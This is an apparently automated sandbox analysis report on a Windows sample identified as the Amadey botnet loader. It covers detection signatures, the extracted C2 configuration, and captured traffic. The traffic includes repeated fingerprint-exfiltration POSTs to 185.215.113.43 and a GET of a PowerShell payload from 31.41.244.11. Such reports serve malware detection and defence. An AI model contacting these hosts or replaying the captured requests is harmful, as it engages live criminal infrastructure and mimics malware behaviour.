Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561683
MD5: 5ca58d76edc0e7291bf3d6bad7edbbe9
SHA1: 694124bf2e8d817b7f188706bbc49d0088317fe2
SHA256: d4e13faefc09eb85be337713e8899e9f6761d45593e33d19b14ac6f986b2a103
Tags: exeuser-Bitsight
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.43/Zu7JuNko/index.phpkAl Avira URL Cloud: Label: malware
Source: http://185.215.113.43/3405117-2476756634-1003 Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php;A Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000002.00000003.2080301971.0000000005470000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Multi AV Scanner detection for domain / URL
Source: http://185.215.113.43/Zu7JuNko/index.php;A Virustotal: Detection: 16% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 55%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50095 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50094 version: TLS 1.2
Source: firefox.exe Memory has grown: Private usage: 1MB later: 252MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49812 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49881 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49869
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 185.215.113.43
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /files/5124158732/KQGBYWk.ps1 HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 36 31 35 30 34 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008615041&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49872 -> 31.41.244.11:80
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ECBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_00ECBE30
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=SrGlYPw41PRTGFr&MD=BoDgbOTN HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
